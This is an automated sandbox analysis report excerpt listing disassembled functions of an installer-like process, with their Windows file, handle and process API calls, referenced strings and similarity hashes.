                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                • API String ID: 3030546534-3446344238
                                                                                                                • Opcode ID: 91a572a01838219e229ade34b419dc8b8180560426a5f546aaea9a592767b08d
                                                                                                                • Instruction ID: 30e618409c82f2afe15098b8eee652010c34a8c6bea819d840b78d0162d2c22e
                                                                                                                • Opcode Fuzzy Hash: 91a572a01838219e229ade34b419dc8b8180560426a5f546aaea9a592767b08d
                                                                                                                • Instruction Fuzzy Hash: B531C376D4123AFBEB215B958C49F5BBA6CEF84770F110115FE08BB291D770AD0096E2
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,009A4E11,?,?), ref: 009B6A77
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,?,009A4E11,?,?), ref: 009B6A7D
                                                                                                                • DuplicateHandle.KERNELBASE(00000000,?,?,009A4E11,?,?), ref: 009B6A80
                                                                                                                • GetLastError.KERNEL32(?,?,009A4E11,?,?), ref: 009B6A8A
                                                                                                                • CloseHandle.KERNEL32(000000FF,?,009A4E11,?,?), ref: 009B6B03
                                                                                                                Strings
                                                                                                                • Failed to append the file handle to the command line., xrefs: 009B6AEB
                                                                                                                • %ls -%ls=%u, xrefs: 009B6AD7
                                                                                                                • burn.filehandle.attached, xrefs: 009B6AD0
                                                                                                                • core.cpp, xrefs: 009B6AAE
                                                                                                                • Failed to duplicate file handle for attached container., xrefs: 009B6AB8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                                                                                • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
                                                                                                                • API String ID: 4224961946-4196573879
                                                                                                                • Opcode ID: 39f1e01b0e406a301098f7d81d777f98ec0fc111edc79c155a7fd1fb7027bdd0
                                                                                                                • Instruction ID: 53b56fcc92136a1cb87eb6d21e95142c3cad5d241b9590870cff98abaf0cddd1
                                                                                                                • Opcode Fuzzy Hash: 39f1e01b0e406a301098f7d81d777f98ec0fc111edc79c155a7fd1fb7027bdd0
                                                                                                                • Instruction Fuzzy Hash: F711723295162AFBCB109FA98D05E9EBB68AF45730F114251FA24FB2D0D7B4AD009790
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 009E3309
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 009E3325
                                                                                                                • VariantClear.OLEAUT32(?), ref: 009E33AC
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E33B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StringVariant$AllocClearFreeInit
                                                                                                                • String ID: `<u$xmlutil.cpp
                                                                                                                • API String ID: 760788290-3482516102
                                                                                                                • Opcode ID: 8ea3b0386e9006cf1d4875d61ed953e66dc5977ef40a2c330a1c402d33c523d2
                                                                                                                • Instruction ID: 75c86854f3968174af7611062ac094e54cca6363d391df53708c4fc0fd334984
                                                                                                                • Opcode Fuzzy Hash: 8ea3b0386e9006cf1d4875d61ed953e66dc5977ef40a2c330a1c402d33c523d2
                                                                                                                • Instruction Fuzzy Hash: 9F21D331901259FFCB12DF96C84DFAFBBB9AF85711F548158F801AB260CB319E009B90
                                                                                                                APIs
                                                                                                                • OpenProcessToken.ADVAPI32(?,00000008,?,009A53BD,00000000,?,?,?,?,?,?,?,009B769D,00000000), ref: 009E0897
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,009B769D,00000000), ref: 009E08A1
                                                                                                                • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,009B769D,00000000), ref: 009E08D3
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,009B769D,00000000), ref: 009E08EC
                                                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,009B769D,00000000), ref: 009E092B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                • String ID: procutil.cpp
                                                                                                                • API String ID: 4040495316-1178289305
                                                                                                                • Opcode ID: a2d5f281f90ef2b418e726143c3bdb4cc021c78258946f730eaa971786c23498
                                                                                                                • Instruction ID: 7e0e3546b1c22f7fc8e401b6a82cb247a5c10d7da739bbc68c11ea8383389559
                                                                                                                • Opcode Fuzzy Hash: a2d5f281f90ef2b418e726143c3bdb4cc021c78258946f730eaa971786c23498
                                                                                                                • Instruction Fuzzy Hash: A221D432D00269EBDB229F969C44A9EBBACEF94711F014056ED14AB251D3B09E40EAD0
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 009B6B49
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009B6BB9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateFileHandle
                                                                                                                • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
                                                                                                                • API String ID: 3498533004-3263533295
                                                                                                                • Opcode ID: 0b3421e5bcf2a466e0ab6eb9e5a854127e886202b4ce967d7471d16693553fca
                                                                                                                • Instruction ID: f1b2654afbe104b66554f1ba11470a9c42015689e1939b1f7085da7a1f177941
                                                                                                                • Opcode Fuzzy Hash: 0b3421e5bcf2a466e0ab6eb9e5a854127e886202b4ce967d7471d16693553fca
                                                                                                                • Instruction Fuzzy Hash: 0A11E632604628BFCB215A68CD45FAB77BCDB85B34F460350FE28EB2E1D7B468118691
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 009E3574
                                                                                                                • InterlockedIncrement.KERNEL32(00A0B6C8), ref: 009E3591
                                                                                                                • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,00A0B6B8,?,?,?,?,?,?), ref: 009E35AC
                                                                                                                • CLSIDFromProgID.OLE32(MSXML.DOMDocument,00A0B6B8,?,?,?,?,?,?), ref: 009E35B8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                • API String ID: 2109125048-2356320334
                                                                                                                • Opcode ID: e7758be465306867ac1a29d8bc7c1d4220b4fa337df31a27788866f25b2fd94a
                                                                                                                • Instruction ID: 99815b957cd9d211341430e31245ff6dcaece5e86718d8cf7e1ade130ce6b006
                                                                                                                • Opcode Fuzzy Hash: e7758be465306867ac1a29d8bc7c1d4220b4fa337df31a27788866f25b2fd94a
                                                                                                                • Instruction Fuzzy Hash: F7F0E530B552AD67C3225BA3FE0DF172D69EB80B58F100929F808C72A4DB70CD428AB0
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 009E4A9D
                                                                                                                • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 009E4ACA
                                                                                                                • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 009E4AF6
                                                                                                                • GetLastError.KERNEL32(00000000,009EB7A0,?,00000000,?,00000000,?,00000000), ref: 009E4B34
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 009E4B65
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$Global$AllocFree
                                                                                                                • String ID: fileutil.cpp
                                                                                                                • API String ID: 1145190524-2967768451
                                                                                                                • Opcode ID: 100e6c1a1af18a82837ae2058a1c18bc0936dbb981191eabc97c75a631d77fe7
                                                                                                                • Instruction ID: 5aaf99c03c4be4676ac9f729d87a27cf0153804990bc59a6eb95b27614ded211
                                                                                                                • Opcode Fuzzy Hash: 100e6c1a1af18a82837ae2058a1c18bc0936dbb981191eabc97c75a631d77fe7
                                                                                                                • Instruction Fuzzy Hash: 3231B636D40269ABC7239A9A8C41FAFBAB9AF84760F154165FD14EB340E730DD0096D4
                                                                                                                APIs
                                                                                                                • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 009C0B27
                                                                                                                • GetLastError.KERNEL32(?,?,?), ref: 009C0B31
                                                                                                                Strings
                                                                                                                • cabextract.cpp, xrefs: 009C0B55
                                                                                                                • Failed to move file pointer 0x%x bytes., xrefs: 009C0B62
                                                                                                                • Invalid seek type., xrefs: 009C0ABD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                • API String ID: 2976181284-417918914
                                                                                                                • Opcode ID: ff37071e7429d98385a2c1c7d1ef9d463d1bd94c2532baf81dc3f79b1b7fce09
                                                                                                                • Instruction ID: d14101bedde8ee4b7f0f441f635a9ab43aa08d5e4694d243e1664abe9b5267d7
                                                                                                                • Opcode Fuzzy Hash: ff37071e7429d98385a2c1c7d1ef9d463d1bd94c2532baf81dc3f79b1b7fce09
                                                                                                                • Instruction Fuzzy Hash: B031C371E4021AEFCF11CF98C884E6EB769FF84724F048219FA2497251D334ED108B91
                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,009BA0E8,00000000,00000000,?,00000000,009A53BD,00000000,?,?,009AD5B5,?), ref: 009A4123
                                                                                                                • GetLastError.KERNEL32(?,009BA0E8,00000000,00000000,?,00000000,009A53BD,00000000,?,?,009AD5B5,?,00000000,00000000), ref: 009A4131
                                                                                                                • CreateDirectoryW.KERNEL32(?,840F01E8,009A5489,?,009BA0E8,00000000,00000000,?,00000000,009A53BD,00000000,?,?,009AD5B5,?,00000000), ref: 009A419A
                                                                                                                • GetLastError.KERNEL32(?,009BA0E8,00000000,00000000,?,00000000,009A53BD,00000000,?,?,009AD5B5,?,00000000,00000000), ref: 009A41A4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                • String ID: dirutil.cpp
                                                                                                                • API String ID: 1375471231-2193988115
                                                                                                                • Opcode ID: 8107aa24fc4a8f7b2b8ab26b54f79b0a2e7aabbd4fd881273d6bed0c2db47503
                                                                                                                • Instruction ID: 09807debc79607f952872908bc2e8d7b3a7e4ff658a06753ff0ee5dee8408c87
                                                                                                                • Opcode Fuzzy Hash: 8107aa24fc4a8f7b2b8ab26b54f79b0a2e7aabbd4fd881273d6bed0c2db47503
                                                                                                                • Instruction Fuzzy Hash: 1511E43664C33596D7711BA54C84B3BA698EFF7B71F114021FD04EB250E3E48C8192D1
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,009A6595,009A6595,?,009A563D,?,?,00000000), ref: 009A56E5
                                                                                                                • GetLastError.KERNEL32(?,009A563D,?,?,00000000,?,?,009A6595,?,009A7F02,?,?,?,?,?), ref: 009A5714
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareErrorLastString
                                                                                                                • String ID: Failed to compare strings.$variable.cpp$version.dll
                                                                                                                • API String ID: 1733990998-4228644734
                                                                                                                • Opcode ID: 8f3cdc6cfc7e31120ebe9640c65b9154db81e3929d5dda17d5139423b2addab8
                                                                                                                • Instruction ID: 4ac97ab052233a8ee6f904ccc8ea096769aa660f287b9daf74f38ef574fd222a
                                                                                                                • Opcode Fuzzy Hash: 8f3cdc6cfc7e31120ebe9640c65b9154db81e3929d5dda17d5139423b2addab8
                                                                                                                • Instruction Fuzzy Hash: E3210436744925EBCB118F98CD44A5ABBA8FB46730B220319F924FB3D0E630EE0186D0
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,009A4F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 009E0A38
                                                                                                                • GetLastError.KERNEL32(?,?,009A4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 009E0A46
                                                                                                                • GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 009E0A8B
                                                                                                                • GetLastError.KERNEL32(?,?,009A4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 009E0A95
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CodeExitObjectProcessSingleWait
                                                                                                                • String ID: procutil.cpp
                                                                                                                • API String ID: 590199018-1178289305
                                                                                                                • Opcode ID: 57da65943f6ff5b6c960471b294cfd59ad4ddba0020279effaf355c94098131b
                                                                                                                • Instruction ID: de081bbd1c614bfc6385a389202ea584b5cff89fbaaea0e03b75ae91b7c7213c
                                                                                                                • Opcode Fuzzy Hash: 57da65943f6ff5b6c960471b294cfd59ad4ddba0020279effaf355c94098131b
                                                                                                                • Instruction Fuzzy Hash: 1A112937D0537DE7C7228B928C0CA9F7AA8EF44770F124124FD50AB390D2B48D409AD0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009C140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,009C0A19,?,?,?), ref: 009C1434
                                                                                                                  • Part of subcall function 009C140C: GetLastError.KERNEL32(?,009C0A19,?,?,?), ref: 009C143E
                                                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 009C0A27
                                                                                                                • GetLastError.KERNEL32 ref: 009C0A31
                                                                                                                Strings
                                                                                                                • cabextract.cpp, xrefs: 009C0A55
                                                                                                                • Failed to read during cabinet extraction., xrefs: 009C0A5F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLast$PointerRead
                                                                                                                • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                                                                                • API String ID: 2170121939-2426083571
                                                                                                                • Opcode ID: 82f146c6297bf1d653ca84c731e54b143437fe105e19ddf355951dc0ae8d1f29
                                                                                                                • Instruction ID: b552e0efe4d4b2ac31f37720805461dbb8277c38f1e19c0c02999556434acd77
                                                                                                                • Opcode Fuzzy Hash: 82f146c6297bf1d653ca84c731e54b143437fe105e19ddf355951dc0ae8d1f29
                                                                                                                • Instruction Fuzzy Hash: 7F11CE76A00269FBCB219F95DC08F9A7BA8FF89760F014119FE18A7291C730AD1097E1
                                                                                                                APIs
                                                                                                                • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,009C0A19,?,?,?), ref: 009C1434
                                                                                                                • GetLastError.KERNEL32(?,009C0A19,?,?,?), ref: 009C143E
                                                                                                                Strings
                                                                                                                • Failed to move to virtual file pointer., xrefs: 009C146C
                                                                                                                • cabextract.cpp, xrefs: 009C1462
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                                                                                • API String ID: 2976181284-3005670968
                                                                                                                • Opcode ID: 4181632ecb0bfba415a75b2920b63edba10bf5eda1cdfeea8eaa87b50c519f3c
                                                                                                                • Instruction ID: 2fa10ff9c4522b89e065b39f637f75ce200727ae4a97a29152633f7b142220fc
                                                                                                                • Opcode Fuzzy Hash: 4181632ecb0bfba415a75b2920b63edba10bf5eda1cdfeea8eaa87b50c519f3c
                                                                                                                • Instruction Fuzzy Hash: B901F73790063AB7C7254A968C04F8BBF19FF417B0711812AFE289A262D7359C10C7D5
                                                                                                                APIs
                                                                                                                • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 009E3F73
                                                                                                                • GetLastError.KERNEL32 ref: 009E3FD6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastRead
                                                                                                                • String ID: fileutil.cpp
                                                                                                                • API String ID: 1948546556-2967768451
                                                                                                                • Opcode ID: b15de11e9e576bbbc2b305184a16615c129fe874e0ff2cc7e11cd78035b09ef6
                                                                                                                • Instruction ID: 71c4c070fe8cb48ed49d4c50720629d3612bf6f25b419ef16ee93373fe2a0ba0
                                                                                                                • Opcode Fuzzy Hash: b15de11e9e576bbbc2b305184a16615c129fe874e0ff2cc7e11cd78035b09ef6
                                                                                                                • Instruction Fuzzy Hash: 29319371E002A99FEB22CF56C844BDA77B8FB44751F0084AAFA49E7240D774DEC08B94
                                                                                                                APIs
                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,009E3F9A,?,?,?), ref: 009E4E5E
                                                                                                                • GetLastError.KERNEL32(?,?,009E3F9A,?,?,?), ref: 009E4E68
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                • String ID: fileutil.cpp
                                                                                                                • API String ID: 442123175-2967768451
                                                                                                                • Opcode ID: 20cba23be9e935e08f8bdf092385ddead7f37e1cc7fae1fe65f0196da25e48cf
                                                                                                                • Instruction ID: 61aa20d6d367ab3fe9aadcfe8e0fbfc6bc417e29fda3730f6b1e100f1377f34b
                                                                                                                • Opcode Fuzzy Hash: 20cba23be9e935e08f8bdf092385ddead7f37e1cc7fae1fe65f0196da25e48cf
                                                                                                                • Instruction Fuzzy Hash: 17F06D33A00269BBC7218E9ADC85ADFBB6DFB44761F010129FD04D7140D730AE1096E0
                                                                                                                APIs
                                                                                                                • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,009B8770,00000000,00000000,00000000,00000000,00000000), ref: 009E4925
                                                                                                                • GetLastError.KERNEL32(?,?,?,009B8770,00000000,00000000,00000000,00000000,00000000), ref: 009E492F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
